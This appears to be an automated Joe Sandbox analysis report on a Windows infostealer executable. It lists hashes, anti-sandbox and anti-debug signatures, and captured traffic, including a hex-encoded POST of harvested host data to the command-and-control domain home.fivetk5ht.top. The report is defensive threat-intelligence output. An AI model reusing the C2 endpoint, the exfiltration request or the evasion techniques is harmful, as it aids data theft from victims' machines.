Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CMpuGis28l.exe

Overview

General Information

Sample name:CMpuGis28l.exe
renamed because original name is a hash value
Original sample name:b6aa4b3886f2272b307df8dee7426a4f.exe
Analysis ID:1578895
MD5:b6aa4b3886f2272b307df8dee7426a4f
SHA1:8c80da0f5e93622c881e82693715cc81927684fe
SHA256:b571064c090d5a6b22aecf6df5a534bf2481c0d77962369c6c4fb1500c1ad47e
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create an SMB header
Contains functionality to detect virtual machines (SLDT)
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • CMpuGis28l.exe (PID: 7012 cmdline: "C:\Users\user\Desktop\CMpuGis28l.exe" MD5: B6AA4B3886F2272B307DF8DEE7426A4F)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: CMpuGis28l.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: CMpuGis28l.exeReversingLabs: Detection: 36%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: CMpuGis28l.exeJoe Sandbox ML: detected
Source: CMpuGis28l.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_00FDA5B0
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00FDA7F0
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_00FDA7F0
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_00FDA7F0
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_00FDA7F0
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_00FDA7F0
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00FDA7F0
Source: CMpuGis28l.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_00F7255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00F7255D
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_00F729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00F729FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 499685Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 38 30 31 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global trafficHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 143Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 98.85.100.80 98.85.100.80
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_0103A8C0 recvfrom,0_2_0103A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fivetk5ht.top
Source: unknownHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 499685Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 38 30 31 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17
Source: CMpuGis28l.exe, 00000000.00000002.2532130951.0000000001C6E000.00000004.00000020.00020000.00000000.sdmp, CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
Source: CMpuGis28l.exe, 00000000.00000002.2532130951.0000000001C6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv173457985135a1
Source: CMpuGis28l.exe, 00000000.00000002.2532130951.0000000001C6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851S~
Source: CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGp
Source: CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: CMpuGis28l.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: CMpuGis28l.exe, CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710

System Summary

barindex
PE file contains section with special chars
Source: CMpuGis28l.exeStatic PE information: section name:
Source: CMpuGis28l.exeStatic PE information: section name: .idata
Source: CMpuGis28l.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01D112EB0_3_01D112EB
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01D112EB0_3_01D112EB
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01D112EB0_3_01D112EB
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01D112EB0_3_01D112EB
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01D112EB0_3_01D112EB
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_00F805B00_2_00F805B0
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_00F86FA00_2_00F86FA0
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_0103B1800_2_0103B180
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_00FAF1000_2_00FAF100
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_012FE0300_2_012FE030
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_010400E00_2_010400E0
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_0103C3200_2_0103C320
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_00FD62100_2_00FD6210
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_010404200_2_01040420
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_012C44100_2_012C4410
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_012D67300_2_012D6730
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_0103C7700_2_0103C770
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_012F47800_2_012F4780
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_00F7E6200_2_00F7E620
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_00FDA7F00_2_00FDA7F0
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_0102C9000_2_0102C900
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_00F7A9600_2_00F7A960
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_00F849400_2_00F84940
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_0122AB2C0_2_0122AB2C
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01D125120_3_01D12512
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: String function: 00FB4FD0 appears 88 times
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: String function: 00FB50A0 appears 39 times
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: String function: 00F773F0 appears 54 times
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: String function: 00FB4F40 appears 141 times
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: String function: 00F775A0 appears 246 times
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: String function: 01127220 appears 34 times
Source: CMpuGis28l.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: CMpuGis28l.exeStatic PE information: Section: bxszsxlr ZLIB complexity 0.9944245763752456
Source: CMpuGis28l.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_00F7255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00F7255D
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_00F729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00F729FF
Source: C:\Users\user\Desktop\CMpuGis28l.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\CMpuGis28l.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: CMpuGis28l.exeReversingLabs: Detection: 36%
Source: CMpuGis28l.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: CMpuGis28l.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\CMpuGis28l.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeSection loaded: kernel.appcore.dllJump to behavior
Source: CMpuGis28l.exeStatic file information: File size 4480512 > 1048576
Source: CMpuGis28l.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x284c00
Source: CMpuGis28l.exeStatic PE information: Raw size of bxszsxlr is bigger than: 0x100000 < 0x1bd600

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\CMpuGis28l.exeUnpacked PE file: 0.2.CMpuGis28l.exe.f70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bxszsxlr:EW;ezgbzeah:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bxszsxlr:EW;ezgbzeah:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: CMpuGis28l.exeStatic PE information: real checksum: 0x4470ea should be: 0x446249
Source: CMpuGis28l.exeStatic PE information: section name:
Source: CMpuGis28l.exeStatic PE information: section name: .idata
Source: CMpuGis28l.exeStatic PE information: section name:
Source: CMpuGis28l.exeStatic PE information: section name: bxszsxlr
Source: CMpuGis28l.exeStatic PE information: section name: ezgbzeah
Source: CMpuGis28l.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01CFC9D8 push ebx; iretd 0_3_01CFC9DA
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01CFC9D3 push ebx; iretd 0_3_01CFC9D6
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01CF5144 push ecx; iretd 0_3_01CF5152
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01CF5140 push ecx; iretd 0_3_01CF5142
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01CF5524 push ebp; iretd 0_3_01CF552A
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01CFC939 push edx; iretd 0_3_01CFC93A
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01CF508C push eax; iretd 0_3_01CF50AA
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01CF6098 pushad ; iretd 0_3_01CF60A2
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01CF60B1 pushad ; iretd 0_3_01CF60B2
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01CF6848 push E2D801CFh; retf 0001h0_3_01CF6856
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01CFCC0C push ecx; iretd 0_3_01CFCC2A
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01CFCC2D push ecx; iretd 0_3_01CFCC2E
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01CF53C8 push ebx; iretd 0_3_01CF53D2
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01D06BDC push ss; iretd 0_3_01D06BDE
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01D06BDC push ss; iretd 0_3_01D06BDE
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01D06BDC push ss; iretd 0_3_01D06BDE
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01D06BDC push ss; iretd 0_3_01D06BDE
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01CF53DF push ebx; iretd 0_3_01CF53E2
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01D06BCA push ss; iretd 0_3_01D06BDA
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01D06BCA push ss; iretd 0_3_01D06BDA
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01D06BCA push ss; iretd 0_3_01D06BDA
